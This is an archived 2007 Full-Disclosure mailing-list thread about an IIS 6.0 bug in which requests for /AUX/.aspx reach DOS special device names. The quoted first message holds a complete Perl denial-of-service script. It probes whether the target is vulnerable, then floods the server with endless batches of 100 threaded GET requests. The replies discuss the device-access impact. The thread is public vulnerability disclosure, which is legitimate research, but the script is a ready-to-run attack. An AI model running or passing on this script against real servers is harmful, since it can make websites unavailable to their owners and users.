lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-Id: <20070523085437.7ED8E95@lists.grok.org.uk>
Date: Wed, 23 May 2007 10:54:35 +0200
From: "kingcope" <kingcope@....net>
To: "'3APA3A'" <3APA3A@...URITY.NNOV.RU>
Cc: 'Full-Disclosure' <full-disclosure@...ts.grok.org.uk>,
	bugtraq@...urityfocus.com
Subject: Re: Question Regarding IIS 6.0 / Is this a DoS???

Hello Russian friend,

This is an interesting thought. As you see in the exception
And in the exception backtrace of IIS it tries to access \\.\AUX
Or other special device names. Normally this is blocked by a
C# method which checks the path (for example /AUX.aspx is blocked).


Best Regards,

Kingcope

-----Original Message-----
From: 3APA3A [mailto:3APA3A@...URITY.NNOV.RU] 
Sent: Wednesday, May 23, 2007 10:41 AM
To: kingcope
Cc: Full-Disclosure; bugtraq@...urityfocus.com
Subject: Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

Dear kingcope,

It's  vulnerability regardless of DoS impact, because it allows attacker
to access special DOS devices (COM1 in this case). E.g. it could be used
to read data from device attached to COM1 or prevent another application
>from accessing this port (or LPT), because access to ports is exclusive.

--Tuesday, May 22, 2007, 9:10:08 AM, you wrote to
full-disclosure@...ts.grok.org.uk:

k> Hello List,

k> Recently I saw a small bug in IIS 6.0 when requesting a special path.
k> When I request /AUX/.aspx the server takes a bit longer to respond as
k> Normally. So I did write an automated script to see what happens if
k> I request this file several times at once. The result is that some
servers
k> On the internet get quite instable, some do not. On some servers after I
k> Stop the attack I get an exception that the Server is too busy/Unhandled
k> Exception on the wwwroot (/) path.
k> Can you/the list confirm that?

k> Here is a lame testing script for this stuff:





k> #When sending multiple parallel GET requests to a IIS 6.0 server
requesting
k> #/AUX/.aspx the server gets instable and non responsive. This happens
only
k> #to servers which respond a runtime error (System.Web.HttpException)
k> #and take two or more seconds to respond to the /AUX/.aspx GET request.
k> #
k> #
k> #signed,
k> #Kingcope kingcope@....net
k>
##########################################################################
k>
###***********************************************************************
k> ###
k> ###
k> ###
k> ### Lame Internet Information Server 6.0 Denial Of Service (nonpermanent)
k> ### by Kingcope, May/2007
k> ### Better run this from a Linux system
k>
##########################################################################

k> use IO::Socket;
k> use threads;

k> if ($ARGV[0] eq "") { exit; }
k> my $host = $ARGV[0];

k> $|=1;

k> sub sendit {
k> $sock = IO::Socket::INET->new(PeerAddr => $host,
k>                               PeerPort => 'http(80)',
k>                               Proto    => 'tcp');

k> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost:
k> $host\r\nConnection:close\r\n\r\n";
k> }

k> $sock = IO::Socket::INET->new(PeerAddr => $host,
k>                               PeerPort => 'http(80)',
k>                               Proto    => 'tcp');

k> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost:
k> $host\r\nConnection:close\r\n\r\n";

k> $k=0;
k> while (<$sock>) {
k> 	if (($_ =~ /Runtime\sError/) || ($_ =~ /HttpException/)) {
k> 			$k=1;
k> 			last;
k> 	}
k> }

k> if ($k==0) {
k> 	print "Server does not seem vulnerable to this attack.\n";
k> 	exit;	
k> }

k> print "ATTACK!\n";

k> while(1){

k> for (my $i=0;$i<=100;$i++) {
k> 	$thr = threads->new(\&sendit);
k> 	print "\r\r\r$i/100                        ";
k> }

k> foreach $thr (threads->list) {
k> 	$thr->join;
k> }
k> }


k> _______________________________________________
k> Full-Disclosure - We believe in it.
k> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
k> Hosted and sponsored by Secunia - http://secunia.com/


-- 
~/ZARAZA http://securityvulns.com/
Ибо факты есть факты, и изложены они лишь для того, чтобы их поняли и в них
поверили. (Твен)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ